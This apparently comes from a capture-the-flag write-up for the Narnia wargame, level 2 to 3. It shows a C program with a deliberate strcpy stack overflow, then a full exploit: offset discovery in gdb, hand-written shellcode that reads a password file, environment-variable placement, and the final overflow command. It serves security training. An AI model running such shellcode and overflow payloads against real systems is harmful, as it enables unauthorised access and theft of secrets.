Narnia2 - narnia3

From JaxHax

Code

//narnia2@melinda:/narnia$ cat narnia2.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Wargame target: copies its first command-line argument into a fixed
 * 128-byte stack buffer and prints it back.
 *
 * argc/argv: standard command line; exactly the no-argument case is
 * rejected with a usage message and exit status 1.
 * Returns 0 after printing the copied argument.
 */
int main(int argc, char * argv[]){
	char buf[128];	/* fixed-size stack buffer; its size is never compared with the input length */

	if(argc == 1){
		printf("Usage: %s argument\n", argv[0]);
		exit(1);
	}
	/*
	 * Defect: strcpy() copies up to the terminating NUL of argv[1] with no
	 * bound, so an argument of 128 bytes or more writes past the end of buf
	 * into adjacent stack memory (classic stack buffer overflow, CWE-121).
	 * The fix is a length-bounded copy, e.g.
	 *   snprintf(buf, sizeof buf, "%s", argv[1]);
	 * or rejecting arguments with strlen(argv[1]) >= sizeof buf.
	 */
	strcpy(buf,argv[1]);
	printf("%s", buf);

	return 0;
}


Solution

Another buffer overflow (BoF). First we need to determine how many bytes it takes to reach the saved return address on the stack, which is the value loaded into EIP when main returns. I will use gdb, pattern_create, and pattern_offset.

$ pattern_create 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

narnia2@melinda:/narnia$ gdb -q ./narnia2
Reading symbols from ./narnia2...(no debugging symbols found)...done.
(gdb) r "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
Starting program: /games/narnia/narnia2 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 32564] will be killed.

Quit anyway? (y or n) y
narnia2@melinda:/narnia$

$ pattern_offset 0x37654136 150
[*] Exact match at offset 140


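This means the first 140 bytes are filler and the next 4 bytes overwrite the saved return address, which ends up in EIP. For the jump address we will point to the environment variable EGG. Note that this relies on the environment region of the stack being executable and sitting at a predictable address, as it does on this wargame host; a non-executable stack (NX) and ASLR are the standard mitigations that break this approach. First let's set it with our payload.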

;$ cat narina2.asm 
; Target: 32-bit x86 Linux, NASM syntax, system calls made through int 0x80
; (eax = call number; ebx, ecx, edx = first three arguments).
; Purpose: open the file named by the bytes stored after _there, read up to
; 50 bytes of it into memory at esp, write 50 bytes from that memory to
; file descriptor 1, then exit with status 0.
; No system call's return value is checked anywhere in this file.
global _start

_start:
	jmp _there		; jump forward to the call that sits directly before the path bytes
_here:

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; open(ptrToString, Readonly)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 5		; eax = 5, the open call number
	pop ebx			; ebx = return address pushed by "call _here" = address of the path bytes
	xor ecx,ecx		; ecx = 0, i.e. read-only flags
	int 0x80		; result (file descriptor) comes back in eax

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Read(fd, buffer, buffersize)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov ebx, eax  ; ebx = value returned by open, used as the file descriptor
	; The stack reservation below is commented out, so the read buffer
	; starts at the current esp and overwrites whatever is stored there.
;	sub esp, 50   ; Give some space on the stack
	xor eax, eax
	mov al, 3		; eax = 3, the read call number
	mov ecx, esp		; ecx = buffer address = current top of stack
	xor edx, edx
	mov dl, 50		; edx = 50, maximum number of bytes to read
	int 0x80		; eax = number of bytes read

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Write()
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; ecx and edx are not reloaded, so write reuses the read buffer and the
	; fixed length 50 rather than the byte count that read returned.
	mov al, 4		; only AL is set; the upper bytes of eax still hold read's return value
	xor ebx, ebx
	inc ebx			; ebx = 1 (standard output)
	int 0x80

	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; exit
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 1		; eax = 1, the exit call number
	xor ebx, ebx		; ebx = 0, exit status
	int 0x80

_there:
	call _here		; pushes the address of the next byte (start of the path) and jumps back
	db '/etc/narnia_pass/narnia3'	; path bytes only; no terminating 0 byte is assembled after them


Then build and extract the shellcode using my scripts.

$ ./buildnasm.sh narina2.asm 

 [*] Compiling narina2.asm with NASM...Done!
 [*] Linking the object file with ld...Done!
 [*] Removing Object file narina2.o...Done!
 [*] Done Son!


$ ./extract_shellcode.sh narina2

..::[ NASM Shellcode Extractor ]::..

-=[ Object Dump ]=-

Disassembly of section .text:
08048060 <_start>:
 8048060:	eb 26                	jmp    8048088 <_there>
08048062 <_here>:
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	b0 05                	mov    $0x5,%al
 8048066:	5b                   	pop    %ebx
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	cd 80                	int    $0x80
 804806b:	89 c3                	mov    %eax,%ebx
 804806d:	31 c0                	xor    %eax,%eax
 804806f:	b0 03                	mov    $0x3,%al
 8048071:	89 e1                	mov    %esp,%ecx
 8048073:	31 d2                	xor    %edx,%edx
 8048075:	b2 32                	mov    $0x32,%dl
 8048077:	cd 80                	int    $0x80
 8048079:	b0 04                	mov    $0x4,%al
 804807b:	31 db                	xor    %ebx,%ebx
 804807d:	43                   	inc    %ebx
 804807e:	cd 80                	int    $0x80
 8048080:	31 c0                	xor    %eax,%eax
 8048082:	b0 01                	mov    $0x1,%al
 8048084:	31 db                	xor    %ebx,%ebx
 8048086:	cd 80                	int    $0x80
08048088 <_there>:
 8048088:	e8 d5 ff ff ff       	call   8048062 <_here>
 804808d:	2f                   	das    
 804808e:	65 74 63             	gs je  80480f4 <_there+0x6c>
 8048091:	2f                   	das    
 8048092:	6e                   	outsb  %ds:(%esi),(%dx)
 8048093:	61                   	popa   
 8048094:	72 6e                	jb     8048104 <_there+0x7c>
 8048096:	69 61 5f 70 61 73 73 	imul   $0x73736170,0x5f(%ecx),%esp
 804809d:	2f                   	das    
 804809e:	6e                   	outsb  %ds:(%esi),(%dx)
 804809f:	61                   	popa   
 80480a0:	72 6e                	jb     8048110 <_there+0x88>
 80480a2:	69                   	.byte 0x69
 80480a3:	61                   	popa   
 80480a4:	33                   	.byte 0x33

-=[ Extracted Shellcode (Length: 69) ]=-

\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x33

narnia2@melinda:/narnia$ export EGG=$(echo -ne "\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x33")


Now with that set we will create the getenvaddr.c program in /tmp (saved here as /tmp/whatwhat.c) and compile it.

narnia2@melinda:/narnia$ nano /tmp/whatwhat.c

narnia2@melinda:/narnia$ cat /tmp/whatwhat.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

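/*
 * Print the address at which the environment variable named by argv[1] is
 * expected to sit when the program whose path is argv[2] runs in place of
 * this one.
 *
 * argv[1]: name of the environment variable to look up.
 * argv[2]: path of the other program, used only for its length.
 * Returns 0 on success, 1 when an argument is missing or the variable is
 * not set.
 */
int main(int argc,char *argv[]){
        char *ptr;

        /* argv[1] and argv[2] are both dereferenced below; without this
           check a missing argument is passed as NULL to getenv()/strlen(). */
        if(argc < 3){
                fprintf(stderr,"Usage: %s <variable> <program path>\n",
                        argc > 0 ? argv[0] : "getenvaddr");
                return 1;
        }
        ptr=getenv(argv[1]);
        /* getenv() returns NULL for an unset variable; doing arithmetic on
           it would print a meaningless address. */
        if(ptr == NULL){
                fprintf(stderr,"%s is not set in the environment\n",argv[1]);
                return 1;
        }
        /* Shift by twice the difference between the two program-name
           lengths. NOTE(review): presumably the program path is stored
           twice above the environment block - confirm for the target OS. */
        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
        /* %p expects a void pointer, so cast explicitly. */
        printf("%s will be at %p\n",argv[1],(void *)ptr);
        return 0;
}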

narnia2@melinda:/narnia$ gcc -m32 /tmp/whatwhat.c -o /tmp/whatwhat
Cannot create temporary file in ./: Permission denied
Aborted

narnia2@melinda:/narnia$ cd /tmp

narnia2@melinda:/tmp$ gcc -m32 /tmp/whatwhat.c -o /tmp/whatwhat


Now using this tool we can determine the address at which our EGG variable will sit when narnia2 runs.

narnia2@melinda:/tmp$ ./whatwhat EGG /narnia/narnia2
EGG will be at 0xffffd8ea


And time to craft our sploit ;-)

narnia2@melinda:/tmp$ /narnia/narnia2 $(perl -e 'print "A"x140; print "\xea\xd8\xff\xff"')
vaequeezee